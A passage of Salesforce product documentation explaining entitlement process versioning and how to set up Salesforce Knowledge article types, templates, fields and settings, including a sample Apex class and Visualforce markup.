Time-triggered actions only occur during your organization's business hours.

• Click Add Workflow Action under a time trigger to add time-dependent actions.

You can add up to ten actions and ten time triggers to each type of milestone action.

Optionally:

• Click Edit next to any action or time trigger to modify it.
• Click Remove next to any action to remove it from the entitlement process. This removes the milestone action from

the entitlement process but does not delete the milestone action.
• Click Delete next to any time trigger to remove it from the milestone. This deletes the time trigger and removes its

actions from the entitlement process but does not delete the milestone actions. The actions are still available when you
click Add Workflow Action and choose Select Existing Action.

See Also:
Milestones Overview
Getting Started with Entitlement Management

Entitlement Versioning Overview

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Note:  Entitlement versioning is currently available through a pilot program. For information on enabling entitlement
versioning in your organization, contact salesforce.com.

Entitlement versioning lets you make changes to existing entitlement processes, even if they’re assigned to active entitlements
and cases. This can be useful if the business rules behind your entitlement processes change, for example, or if you need to
create multiple versions of the same entitlement process that have only minor differences. With entitlement versioning, you
don’t need to create entirely new processes; you can simply create new versions of existing ones.

When you create a new version of an entitlement process, you can change any of the following:

• Name

• Description

• Whether the process is active

• Whether the version is the default

• Entry criteria
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• Exit criteria

You can also add notes about the version. This makes it easy to differentiate between multiple versions of the same process,
especially if they have the same name.

On new versions of entitlement processes that are currently in use, you can add new milestones, but can’t edit existing ones.
On new versions of processes that aren’t currently in use, you can both add new milestones and edit existing ones.

Once you’ve created a new version of an entitlement process, you can choose to apply it to all entitlements and cases assigned
to the previously used version, or only to new entitlements and cases.

See Also:
Entitlement Processes Overview
Enabling Entitlement Versioning
Creating New Versions of Entitlement Processes
Using New Versions of Entitlement Processes

Creating New Versions of Entitlement Processes

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”To create and update entitlement processes:

Note:  Entitlement versioning is currently available through a pilot program. For information on enabling entitlement
versioning in your organization, contact salesforce.com.

Entitlement versioning lets you make changes to existing entitlement processes, even if they’re assigned to active entitlements
and cases. This can be useful if the business rules behind your entitlement processes change, for example, or if you need to
create multiple versions of the same entitlement process that have only minor differences. With entitlement versioning, you
don’t need to create entirely new processes; you can simply create new versions of existing ones.

Before you can create new versions of entitlement processes, you need to enable entitlement versioning.

To create a new version of an entitlement process:

1. From Setup, click Customize > Entitlement Management > Entitlement Processes.
2. Click the name of the entitlement process for which you want to create a new version.
3. In the Entitlement Process Versions list, click the version of the process from which you want to create a new version.
4. On the Entitlement Process Detail page, click Create New Version.
5. Specify the information for the new version.

We recommend using the Version Notes field to include details about what makes the version you’re creating different
from others. This makes it easier to differentiate between multiple versions of the same entitlement process.

6. Click Save.
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On new versions of entitlement processes that are currently in use, you can add new milestones, but can’t edit existing ones.
On new versions of processes that aren’t currently in use, you can both add new milestones and edit existing ones.

Once you’ve created a new version of an entitlement process, you can choose to apply it to all entitlements and cases assigned
to the previously used version, or only to new entitlements and cases.

See Also:
Entitlement Processes Overview
Entitlement Versioning Overview
Using New Versions of Entitlement Processes

Using New Versions of Entitlement Processes

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”To create and update entitlement processes:

Note:  Entitlement versioning is currently available through a pilot program. For information on enabling entitlement
versioning in your organization, contact salesforce.com.

Once you’ve created a new version of an entitlement process, you can choose to apply it to all entitlements and cases assigned
to the previously used version, or only to new entitlements and cases.

To apply it to a new entitlement (and, by extension, cases with that entitlement), simply choose it from the Entitlement Process
lookup field when you create the entitlement.

To apply a new entitlement process to cases and entitlements assigned to a previously used version of the process, follow these
steps:

1. From Setup, click Customize > Entitlement Management > Entitlement Processes.
2. Click the name of the entitlement process you want to work with.

The list on the main Entitlement Processes page shows the default version of each process. Click the name of a process to
see a list of all available versions of it.

3. On the detail page for the entitlement process, click the name of the version you want to update cases and entitlements
to.

4. Click New Update Rule.
5. Choose the version of the entitlement process you want to update from.

You can update from any other version of the process, whether or not it’s active.
6. To prevent milestone warning and violation actions from being triggered on cases to which warnings or violations will

newly apply after the update, select Don’t Trigger New Milestone Warnings and Violations.
7. Click Save.

The update rule detail page shows the estimated number of entitlements and cases that will be updated.
8. Click Start to begin the update process.
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Throughout the update process, the update rule detail page will refresh to show the number of entitlements and cases processed.
To stop the update at any time, click Stop.

See Also:
Entitlement Versioning Overview
Creating New Versions of Entitlement Processes

Entitlement Management Notes, Limitations, and Best
Practices

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Note:  Entitlement versioning is currently available through a pilot program. For information on enabling entitlement
versioning in your organization, contact salesforce.com.

Notes and Limitations
• You can only use contract line items if your organization uses products.
• You can't create list views for contract line items..
• You can't share entitlements. If an entitlement has an account, its sharing is inherited from account sharing.
• You can't share contract line items. Sharing for contract line items is inherited from service contract sharing. For example,

users with the “Read” permission on service contracts inherit the “Read” permission on contract line items.
• If you want your customers or partners to access their entitlements or service contracts, add entitlements or service contracts

to your portals.

Don't add the following entitlement process fields to case page layouts for portal users because portal users shouldn't access
information related to your internal support processes: Entitlement Process Start Time, Entitlement Process
End Time, Stopped, and Stopped Since.

• If you use the Per Incident field to limit the number of cases entitlements support, we recommend setting field-level
security on the Cases Per Incident and Remaining Cases fields to read-only for users who shouldn't modify per
incident support.

• Entitlements don't automatically apply to cases created with Web-to-Case or Email-to-Case. If needed, you can add
entitlements to these features using Apex code.

• You can't add milestones to cases without using entitlement processes. Entitlement processes apply milestones to cases.
• Merge fields for entitlements on cases aren't supported. For example, if you add the Entitlement Name

{!Case.Entitlement} merge field to an email template, the field is not populated on the template.

Best Practices
• Set up lookup filters on cases to restrict the entitlements-related items returned. For example, when portal users create a

case and select the Entitlement Name field, they can choose only entitlements registered to their account or contact.
• Use Apex code to automatically mark milestones as Completed on cases that match unique criteria. For example, you can

create an Apex trigger on EmailMessage that marks a first response milestone as Completed on cases when support reps
send email from cases.

• Use the Mass Transfer Tool to transfer multiple service contracts from one user to another.
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• Customize the values for the Type field on entitlements to match the types of entitlements your team provides or sells,
such as Web support or online training.

• Add the Status Icon field to entitlements, service contracts, and contract line items page layouts so that users can easily
see one of these three statuses:

◊  Active
◊  Expired
◊  Inactive

Additionally, you can add fields to page layouts.
• Use sharing rules to give users access to service contracts they don't own; you can't extend the organization-wide default

sharing model for service contracts.
• If you use products, set up entitlement templates to predefine terms of support that users can add to products.
• Set up entitlement processes to enforce all the steps that your support team must complete to resolve cases.
• If you’re not using entitlement versioning, we recommend activating entitlement processes after you've added milestone

actions to them. This is because you can't update or delete milestone actions on a process after it's activated and applied
to a case. We recommend creating new entitlement processes to replace existing, active ones applied to cases.

• If you’re using entitlement versioning, you can update existing entitlement processes, even when they’re assigned to active
entitlements and cases.

• You can create up to 1000 entitlement processes and include up to ten milestones in each entitlement process. Contact
salesforce.com for information on increasing the number of entitlement processes and milestones.

• Use custom report types to define report criteria from which users can run and create reports on entitlements and service
contracts.

• You can view cases with milestones by creating case list views that filter on milestone fields.
• Use the entitlement process queue to view or cancel active entitlement process actions.
• You can add validation rules to case milestones so that when users update a milestone on a case, it must meet the standards

you specify before they can save it. For example, you can create a validation rule that ensures users select milestone completion
dates that occur after case creation dates.

To begin adding validation rules for case milestones, from Setup, click Customize > Cases > Case Milestones > Validation
Rules.

See Also:
Entitlement Management Overview
Setting Up Entitlement Management
Entitlement Management Implementation Guide
Entitlement Versioning Overview
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ADDING A KNOWLEDGE BASE

ADDING SALESFORCE KNOWLEDGE

Salesforce Knowledge Documentation Overview
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is a knowledge base where users can easily create and manage content, known as articles, and quickly
find and view the articles they need. Use the lists below to find Salesforce Knowledge information in the Salesforce
documentation set.

Overview, Best Practices, and Tips for Salesforce Knowledge

• Salesforce Knowledge Overview
• Salesforce Knowledge Terminology
• Salesforce Knowledge Implementation Tips
• Salesforce Knowledge Best Practices

Setting up Salesforce Knowledge

• Setting Up Salesforce Knowledge
• Granting Permissions for Salesforce Knowledge Users
• Defining Article Types
• Importing Articles

Using the Salesforce Knowledge Base

• The Articles Tab
• Searching for Articles
• Finding Articles to Solve Cases
• Managing Articles and Translations
• Publishing Articles and Translations

Defining Data Categories for Salesforce Knowledge Articles

• What are Data Categories?
• Creating and Modifying Category Groups
• Adding Data Categories to Category Groups
• Managing Data Categories
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Translating Salesforce Knowledge Articles

• Setting up a Multilingual Knowledge Base
• Supporting Multiple Languages in Your Knowledge Base
• Creating an Article Queue
• Translating Articles within Salesforce Knowledge
• Exporting Articles for Translation
• Importing Article Translations

Sharing Your Salesforce Knowledge Base

• Service Cloud Console and Salesforce Knowledge
• Customer Portal and Salesforce Knowledge
• Partner Portal and Salesforce Knowledge
• If you want visitors to your public website to view Salesforce Knowledge articles, install the Public Knowledge Base app from

the AppExchange. To install, configure, and customize your public knowledge base with this package, see the Public
Knowledge Base AppExchange App Guide available on the AppExchange.

Developing with Salesforce Knowledge

• The Salesforce Knowledge Developer's Guide has Salesforce Knowledge specific development information along with
tutorials and examples.

• The SOAP API Developer's Guide has information on theSalesforce Knowledge API:

◊ Guidelines
◊ Objects
◊ Calls

• The Metadata API Developer's Guide has information on Salesforce Knowledge Metadata API objects.
• The Visualforce Developer's Guide has information on Salesforce Knowledge Visualforce components.
• The Force.com Apex Code Developer's Guide has information on the Apex KnowledgeArticleVersionStandardController

Class.
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Setting Up Salesforce Knowledge
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Users”To create or edit users:

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create article types and article actions:

“Manage Synonyms”To manage synonyms:

“Manage Data Categories”To create data categories:

As a knowledge base administrator, getting started involves choosing how your articles will be formatted and published, then
making the knowledge base available to authors, reviewers, publishers, and others on your team. After initial setup you can
enable numerous settings, such as making articles available to customers, partners, and public website visitors.

Before setting up Salesforce Knowledge, make sure that you are a Salesforce Knowledge user:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Details.

3. Ensure that the Knowledge User checkbox is selected.

Getting Started with Salesforce Knowledge

Complete the following steps to enable Salesforce Knowledge in your organization:

1. From Setup, click Customize > Knowledge > Article Types and create one or more article types.

Note: Before users can access article types, an administrator must set object permissions for article types.

2. From Setup, click Customize > Knowledge > Settings. Confirm that you want to enable Salesforce Knowledge and click
Enable Knowledge.

3. Select your general settings.

• Select Allow users to create and edit articles from the Articles tab to enable users to edit
articles without going to the Article Management tab. Users can click Edit an article to open the article edit page. If
a published version of the article already exists, they have the option to view the published version or edit the current
version. If a draft version exists, they can continue with editing the existing draft, but should carefully review the draft
so that they don’t overwrite unpublished changes.
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• Select Activate Validation Status field to add a Validation Status field to all Salesforce Knowledge articles.
• Select Allow users to add external multimedia content to HTML in the standard editor to

allow <iframe> elements in the standard editor to embed multimedia content from the Dailymotion, Vimeo, and
YouTube websites.

4. Select at least one option under Article Summaries.

• Internal App
• Customer
• Partner

5. Choose a Default Knowledge Base Language. This is the language your authors will use to write most of the articles. We
recommend that your Default Knowledge Base Language and your organization's language be the same.

6. If your Knowledge base supports multiple languages, select Multiple Languages, add the languages supported, and
adjust their settings.

Note:  You can’t remove a language once it is added.

7. Optionally, select your Case Settings.

• Allow users to create an article from a case. Choose either the simple or standard editor and define the default article
type, assignee, and any Apex customization.

• Use a profile to create article PDFs.
• Allow users to share articles via public URLs.

8. Optionally, check Allow users to create an article from a reply to create articles from replies in Answers.
9. Click Save.

Complete the following steps to give internal users the ability to manage and view articles:

1. Create the category groups and individual categories that authors will assign to articles. Categories help agents, customers,
partners, and visitors find articles in the knowledge base. See Managing Data Categories on page 2246 for more details.

2. After setting up your data categories, you can control article visibility based on category. By default, Salesforce Knowledge
users have access to all articles associated with any category. To restrict article visibility, see Editing Category Group
Visibility on page 2256.

3. Give internal users access to Salesforce Knowledge by assigning each user a Salesforce Knowledge feature license:

a. From Setup, click Manage Users > Users.
b. Click Edit next to the user's name or click New to create a new user.
c. Select the Knowledge User checkbox.

Note:  For instructions on giving portal users access to Salesforce Knowledge, see Enabling Salesforce Knowledge
in the Customer Portal and Enabling Salesforce Knowledge in the Partner Portal.

4. Verify that each user has the appropriate Salesforce Knowledge user permissions enabled. For more information see
Granting Permissions for Salesforce Knowledge Users on page 2267.

5. Make the Article Management and Articles tabs visible by adding them to a custom app or instructing your users to add
the Article Management or Articles tab to an existing tab set. Note the following:

• All users with access to Salesforce Knowledge can see the Articles tab.
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• Users with the “Manage Articles” user permission can see the Article Management tab.

See Also:
Salesforce Knowledge Implementation Guide
Creating and Assigning Salesforce Knowledge Users and Groups
Customizing Salesforce Knowledge

Defining Article Types

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create, edit, or delete article types:

The first step when setting up Salesforce Knowledge is to create one or more article types. You cannot enable Salesforce
Knowledge until at least one article type is created.

When creating an article, the author must select an article type. Article types, such as FAQs and Tutorials, provide the format
and structure to control how an article displays for each audience, known as a channel. For each article type you can create
custom fields, customize the layout by adding or removing sections and fields, and choose a template for each channel. You
can also create workflow rules and approval processes to help your organization track and manage article creation and publication.

Note: Before users can access article types, an administrator must set object permissions for article types.

To create an article type:

1. From Setup, click Customize > Knowledge > Article Types.
2. Click New Article Type or edit an existing article type.
3. Enter the following:

DescriptionField

A name used to refer to the article type in any user interface
pages.

Label

The plural name of the object. If you create a tab for this
object, this name is used for the tab.

Plural Label

If it is appropriate for your organization’s default language,
specify the gender of the label. This field appears if the

Gender
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DescriptionField

organization-wide default language expects gender. Your
personal language preference setting does not affect whether
the field appears. For example, if the organization’s default
language is English and your personal language is French,
you are not prompted for gender when creating an article
type.

If it is appropriate for your organization’s default language,
check if your label should be preceded by "an" instead of "a".

Starts with a vowel sound

(Read only) A unique name used to refer to the article type
when using the Force.com API. In managed packages, this

Object Name

unique name prevents naming conflicts on package
installations. The Object Name field can contain only
underscores and alphanumeric characters. It must be unique,
begin with a letter, not include spaces, not end with an
underscore, and not contain two consecutive underscores.

An optional description of the article type. A meaningful
description will help you remember the differences between
your article types when you are viewing them in a list.

Description

Select this option to track the full history of an article and
its versions. The system records and displays field updates,

Track Field History

publishing workflow events, and language versions for the
master article and any translations.

Indicates whether the article type is visible outside Setup.
In Development means article managers cannot choose this

Deployment Status

article type when creating articles. Only select Deployed
after you are done creating the article type.

4. Click Save.
5. On the article type detail page, complete the following information:

• In the Fields related list, create or modify custom fields as needed.
• In the Fields related list, edit the article-type layout as needed to rearrange fields and create sections.
• In the Channel Displays related list, choose a template for the Internal App, Partner, Customer, and Public Knowledge

Base.

See Also:
Setting Up Salesforce Knowledge
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Deleting Article Types

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To delete article types:

To delete an article type:

1. From Setup, click Customize > Knowledge > Article Types.
2. Next to the target article type, click Del.
3. Confirm that you want to delete the article type.

Notes on Deleting Article Types

Note the following about deleting article types:

• If your organization has only article type, you cannot delete it. Every Salesforce Knowledge org requires at least one deployed
article type. Create a new article type and then delete the old one.

• Any articles associated with a deleted article type are automatically removed from all channels. This includes draft, published,
and archived articles.

• Salesforce does not display deleted article types in the Recycle Bin with other deleted records. Instead, deleted article types
appear in the Deleted Article Types list on the article list view page for 15 days. During this time you can restore the article
type and its articles, or permanently erase the article type and its articles. After 15 days, the article type and its articles are
permanently erased.

• If a user clicks a bookmark to a deleted article's URL, an Insufficient Privileges message displays.

See Also:
Defining Article Types
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Modifying Article-Type Layouts

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To customize the article-type layout:

Article-type layouts determine which fields users can view and edit when entering data for an article. They also determine
which sections appear when users view articles. The format of the article, for example whether layout sections display as subtabs
or as a single page with links, is defined by the article-type template. Each article type has only one layout, but you can choose
a different template for each of the article type's four channels.

Tip: You can also use field-level security to hide fields on article types. For example, if you publish the same article
in the internal app and the Customer Portal, you may want to use field-level security to hide a custom field such as
Internal Comments from Customer Portal users.

To modify an article-type layout:

1. From Setup, click Customize > Knowledge > Article Types.
2. Select one of the article types in the list.
3. In the Fields related list, click Edit Layout.
4. When working on the layout:

• The layout editor consists of two parts: a palette on the upper portion of the screen and the layout on the lower portion
of the screen. The palette contains the available fields and a section element. The layout contains an Information section
and space for you to add sections. By default, all custom fields are included in the Information section.

Note:  The Article Number, Summary, Title, and URL Name standard fields do not display in the layout.
Article Number and Summary appear in a read-only Properties section at the top of the published article.
Also included in this header are the First Published, Last Modified, and Last Published fields.

• To add a new section, drag and drop the section element into the palette.
• To change the name of a section, click its title. You cannot rename the Information section.

• To remove a field from a section, drag it to the right side of the palette or click the  icon next to the field.

• To remove a section from the article-type layout, click the  icon next to the section name.
• Use the undo and redo buttons to step backwards and forwards, respectively.
• Use the following keyboard shortcuts:

◊ Undo = CTRL+Z
◊ Redo = CTRL+Y
◊ Quick Save = CTRL+S

• To select multiple elements individually, use CTRL+click. To select multiple elements as a group, use SHIFT+click .
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• To quickly locate any item in the palette, use the Quick Find box. The Quick Find box is especially useful for article-type
layouts that have large numbers of items available in the palette.

• To save your changes and continue editing the article-type layout, click Quick Save.
• To save your changes when you are done customizing the article-type layout, click Save. If you navigate away from

your article-type layout before clicking save, your changes will be lost.

See Also:
Defining Article Types
Adding Custom Fields to Article Types

Assigning Article-Type Templates

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Salesforce Knowledge”To edit article-type template assignments:

Article types in Salesforce Knowledge require a template for each channel.

The article-type template specifies how the sections defined in the article-type layout are rendered. Salesforce provides two
standard article-type templates, Tab and Table of Contents, and you can use Visualforce to create custom templates.

If you choose the Tab template, the sections you defined in the layout appear as tabs when users view an article.

Figure 12: Published Article Using the Tab Article-Type Template

If you choose the Table of Contents template, the sections you defined in the layout appear on one page with hyperlinks to
each section title.
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Figure 13: Published Article Using the Table of Contents Article-Type Template

To choose the template assignment for a channel:

1. From Setup, click Customize > Knowledge > Article Types.
2. Click a label to view the article-type detail page.
3. In the Channel Displays related list, click Edit.
4. For each channel, specify the template.

For Internal App, Customer and Partner, Tab is the default template. For Public Knowledge Base, Table of Contents is
the default template. If your organization has a custom template for this article type, it also appears in the drop-down
menu.

5. Click Save.

See Also:
Modifying Article-Type Layouts
Defining Article Types

Creating Custom Article-Type Templates

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create, edit, or delete article-type templates:

Article types in Salesforce Knowledge require a template for each channel.

The standard article-type templates—Tab and Table of Contents—specify how the sections in the article-type layout appear
in the published article. For example, if you choose the Tab template, the sections defined in the layout appear as tabs when
users view an article. With the Table of Contents template, sections appear on a single page with hyperlinks to each section.
You can also create a custom template using Visualforce. Custom templates are not associated with the article-type layout.
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To create a custom article-type template:

1. From Setup, click Customize > Knowledge > Article Types.
2. Find the article type you are creating the template for and click its title to open the detail page. Note the article type's API

Name. You will need this value when you create the Visualforce page.
3. From Setup, click Develop > Pages.
4. Click New.
5. In the Name text box, enter the text that should appear in the URL as the page name. This name can contain only underscores

and alphanumeric characters, and must be unique in your organization. It must begin with a letter, not include spaces, not
end with an underscore, and not contain two consecutive underscores.

6. In the Label text box enter the text that users will see when choosing this template from the Channel Displays related
list on the article type detail page.

7. Add your Visualforce markup. The only requirement for custom article-type templates is that the standard controller be
equal to the API Name of the article type. For example, if the API Name of the article type is Offer__kav, your markup
would be:

<apex:page standardController="Offer__kav">

... page content here ...

</apex:page>

Note:  Click Component Reference for a list of the Visualforce components, such as
knowledge:articleRendererToolbar and knowledge:articleCaseToolbar, available for use in
custom article-type templates.

8. If your article type has a File field, you can allow users to download the field's content. In the following example, the article
type is Offer, the name of the File field is my_file, and the text that appears as a link is Click me:

<apex:outputLink value="{!URLFOR($Action.Offer__kav.FileFieldDownload,
Offer__kav.id, ['field'=$ObjectType.Offer__kav.fields.my_file__Body__s.name])}">Click
me</apex:outputLink>

Note:  If the File field is empty (meaning the author didn't upload a file), the link still appears on the published
article but has no function. If you do not want the link to appear when the File field is empty, replace Click
me in the example with the name of the file, for example, {!Offer__kav.my_file__Name__s}.

9. Click Save. Your custom template can now be assigned to any channel on the article type. See Assigning Article-Type
Templates on page 2218 for details.

See Also:
Developer's Guide: Visualforce Developer's Guide
Managing Article Types
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Managing Article Types

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

”Customize Application”

AND

“Manage Salesforce Knowledge”

To create, edit, or delete article types:

When creating an article, the author must select an article type. Article types, such as FAQs and Tutorials, provide the format
and structure to control how an article displays for each audience, known as a channel. For each article type you can create
custom fields, customize the layout by adding or removing sections and fields, and choose a template for each channel. You
can also create workflow rules and approval processes to help your organization track and manage article creation and publication.

After creating your article types, you can customize, edit, and delete them. From Setup, click Customize > Knowledge >
Article Types to display the Article Types list page, which provides a list of all the article types defined for your organization.
From the Article Types list page you can:

• Click New Article Type to define an article type.

• Click the article-type name to display the detail page. On the detail page you can edit existing fields, add new custom
fields, add and edit sections on the article-type layout, and select a template for each channel.

• Click Del to delete an article type.

See Also:
Modifying Article-Type Layouts
Assigning Article-Type Templates
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Adding Custom Fields to Article Types

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create or change custom fields:

Create custom fields to store information that is important to your articles. Before you begin, determine the type of custom
field you want to create. The only standard fields provided on article types are Article Number, Summary, Title, and
URL Name, so at minimum you’ll want to create a field where authors can write the body of the article.

Note:  Authors can view the URL Name when they create or edit an article. The URL Name does not appear to end
users viewing published articles.

To add a custom field:

1. From Setup, click Customize > Knowledge > Article Types.
2. Select an article type.
3. Click New in the Fields related list.
4. Choose the type of field to create, and click Next.
5. Enter a field label. The field name is automatically populated based on the field label you enter. This name can contain

only underscores and alphanumeric characters, and must be unique in your organization. It must begin with a letter, not
include spaces, not end with an underscore, and not contain two consecutive underscores. Ensure the custom field name
is not identical to any standard field name for that object.

6. Enter any field attributes, such as Description, and click Next to continue.

Note:  You cannot enter a default value for any custom field.

7. Set the field-level security to determine whether the field should be visible and editable or read only for specific profiles,
and click Next. Field-level security allows you to control which fields are visible in different channels.

8. If you do not want the field to be added automatically to the article-type layout, uncheck Yes, add this custom
field to the layout.

9. Click Save to finish or Save & New to create more custom fields.
10. Optionally rearrange your custom fields on the article-type layout.

Note:  Creating fields may require changing a large number of records at once. To process these changes efficiently,
Salesforce may queue your request and send an email notification when the process has completed.
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Warning:  You will lose your data if you convert a custom field on an article type into any other field type. Do not
convert a custom field on an article type unless no data exists for the field.

See Also:
Setting an Article's Field-Level Security
Modifying Article-Type Layouts
Assigning Article-Type Templates

Using the Fields Related List

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To create or change custom fields:

“Manage Salesforce Knowledge”To modify article-type layouts:

On the Fields related list on the article-type detail page, you can:

• Edit the Article Number, Summary, Title, and URL Name standard fields. These fields are required on all article
types and cannot be deleted.

• Click New to create a custom field. All article types should have at least one rich text area field for writing article text and
a File field for attaching documents to articles. For help deciding which type of custom fields your article type needs, review
the custom fields for article types.

• Click Set History Tracking to track field updates for the article type.

• Click Edit Layout to rearrange or remove fields and modify sections for the article type.

See Also:
Modifying Article-Type Layouts
Setting an Article's Field-Level Security
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Customizing Salesforce Knowledge Settings
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To enable Salesforce Knowledge:

Note: Before enabling Salesforce Knowledge, you must create at least one article type.

Salesforce Knowledge is a knowledge base where users can easily create and manage content, known as articles, and quickly
find and view the articles they need. For more information, see Salesforce Knowledge Overview.

From Setup, click Customize > Knowledge > Settings. If Salesforce Knowledge has not been enabled in your organization,
an Enable Knowledge option is available. If Salesforce Knowledge is already enabled, you can configure the following optional
settings.

Allow users to create and edit articles from the Articles tab

If this checkbox is selected, users can create and edit articles from the Articles tab.

Activate the Validation Status field for articles

When you activate the Validation Status field, users can select values to show whether the content of the article
has been validated or not.

Allow users to add external multi-media content to the standard HTML editor

If this checkbox is selected, users can cut and paste <iframe> HTML to embed multi-media content from the following
sites: Dailymotion, Vimeo, and YouTube.  

Show article summaries in article list views

For each channel, decide whether an article's Summary details should display on the Articles tab.

Choose the language(s) for your knowledge base

The Default Knowledge-Base Language should be the primary language used for writing articles. It defaults to
your organization's language.

If you will publish articles in more than one language, select Multiple Languages and choose the translation settings.
For instructions, see Setting up a Multilingual Knowledge Base on page 2231.

Allow users to create an article from a case

If this checkbox is selected, users can create a draft article that is attached to the case when the article is published using
one of the following options.
• Create articles using the simple editor only when closing cases.

• Create articles using the standard editor any time a user creates an article. Make sure that users have “Manage Articles,”
“Read,“ and “Create” permissions.
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Select a default article type. For articles created when closing a case, assign the article to a user.

You can help agents create articles more quickly by selecting an Apex class that pre-populates any of the fields on the
draft. By default the Title field in all draft articles contains the case subject.

If you enable this option, also click Layout Properties on each case-close page layout and select Enable submissions
during case close and Submit Articles.

Use a profile to create customer-ready article PDFs on cases

By default, when a user creates an article PDF directly from a case, the PDF includes all the article fields visible to that
user. If you want PDFs to be generated according to a different profile, for example, a profile that hides certain fields
from customers, select Use a profile to create customer-ready article PDFs on cases and choose
the profile that should determine field visibility.

Allow users to share articles via public URLs.

You can share an article that is available on a public knowledge base with a URL. In the Available Sites list, select the
sites you want to allow your agents to send URLs from and add them to the Selected Sites list. Agents can then email
customer service clients with a URL to link directly to the article in your public knowledge base.

Allow users to create an article from a reply

If this checkbox is selected, members of an answers community or Chatter Answers community can convert helpful
replies into articles. The article type you select determines which fields appear on the draft article, but on all articles the
Title contains the question and the Summary contains the reply. After a reply is promoted to an article, the original
reply has a status message indicating its association with the draft article. When the article is published, the message on
the reply includes a link to the article.

See Also:
Setting Up Salesforce Knowledge
Managing Salesforce Knowledge Synonyms
Example Apex Customization for Submitting Articles from Cases

Example Apex Customization for Submitting Articles from Cases

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To edit Salesforce Knowledge settings:

“Author Apex”To create an Apex class:

Note: You can add, edit, or delete Apex using the Salesforce user interface only in a Developer Edition organization,
a Salesforce Enterprise Edition trial organization, or sandbox organization. In a Salesforce production organization,
you can only make changes to Apex by using the Metadata API deploy call, the Force.com IDE, or the Force.com
Migration Tool. The Force.com IDE and Force.com Migration Tool are free resources provided by salesforce.com
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to support its users and partners, but are not considered part of our Services for purposes of the salesforce.com Master
Subscription Agreement.

If your organization allows customer-support agents to create Salesforce Knowledge articles while closing a case, you can use
Apex to pre-populate fields on draft articles. To do so, create an Apex class and assign it to the case article type using the
example below as a guide. For more information on the syntax and use of Apex, see the Force.com Apex Code Developer's Guide.

Set up the example by creating the following article type, field, and data categories. Do not change the default API Name
assigned to each new object.

1. Create an article type called FAQ.
2. Create a text custom field called Details.
3. Create a category group called Geography and assign it a category called USA.
4. Create a category group called Topics and assign it a category called Maintenance.

To finish the example, create and assign the Apex class:

1. From Setup, select Develop > Apex Classes and click New.
2. Click Version Settings to specify the version of Apex and the API used with this class. If your organization has installed

managed packages from the AppExchange, you can also specify which version of each managed package to use with this
class. Use the default values for all versions. This associates the class with the most recent version of Apex and the API,
as well as each managed package. You can specify an older version of a managed package if you want to access components
or functionality that differs from the most recent package version. You can specify an older version of Apex and the API
to maintain specific behavior.

3. In the Apex Class text box enter the following script and click Save:

public class AgentContributionArticleController {
// The constructor must take a ApexPages.KnowledgeArticleVersionStandardController

as an argument
public

AgentContributionArticleController(ApexPages.KnowledgeArticleVersionStandardController
ctl) {

SObject article = ctl.getRecord(); //this is the SObject for the new article.

//It can optionally be cast to the proper
article type, e.g. FAQ__kav article = (FAQ__kav) ctl.getRecord();

String sourceId = ctl.getSourceId(); //this returns the id of the case that was
closed.

Case c = [select subject, description from Case where id=:sourceId];

article.put('title', 'From Case: '+c.subject); //this overrides the default
behavior of pre-filling the title of the article with the subject of the closed case.

article.put('Details__c',c.description);

ctl.selectDataCategory('Geography','USA'); //Only one category per category
group can be specified.

ctl.selectDataCategory('Topics','Maintenance');
}

4. From Setup, select Customize > Knowledge > Settings and click Edit.
5. Verify the case settings; using our example, the Default article type should be FAQ.
6. From the Use Apex Customization menu, select AgentContributionArticleController and click Save.

As a result of this example, when agents create an article from the case-close screen:

• The data from the Description field on the case appears in the Details field of the article.
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• The title of the article contains From Case: and the case subject.

• The article is automatically assigned to the USA data category and the Maintenance data category.

See Also:
Setting Up Salesforce Knowledge

Sending Articles from Cases

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To set up Email-to-Case or On-Demand Email-to-Case:

“Modify all Data”

AND

“Customize Application”

To enable Email-to-Case or On-Demand Email-to-Case:

“Customize Application”To customize page layouts:

“Edit HTML Templates”To create or change HTML email templates:

“Manage Public Templates”To create or change public email template folders:

“Customize Application”To create or change Visualforce email templates:

If articles are associated with a case, users working on the case can attach PDF versions of the articles to an email simply by
choosing a template you create. This capability is available if Email-to-Case or On-Demand-Email-to-Case  is set up and
the Email related list is visible on case page layouts.

Creating an Email Template that Converts Articles to PDF Files

To allow users working on a case to automatically attach article PDFs to an email message:

1. From Setup, click Communication Templates > Email Templates.
2. Click New Template to create a template from scratch or click Edit next to an existing template. The new or edited

template must include the Articles as PDFs case field.
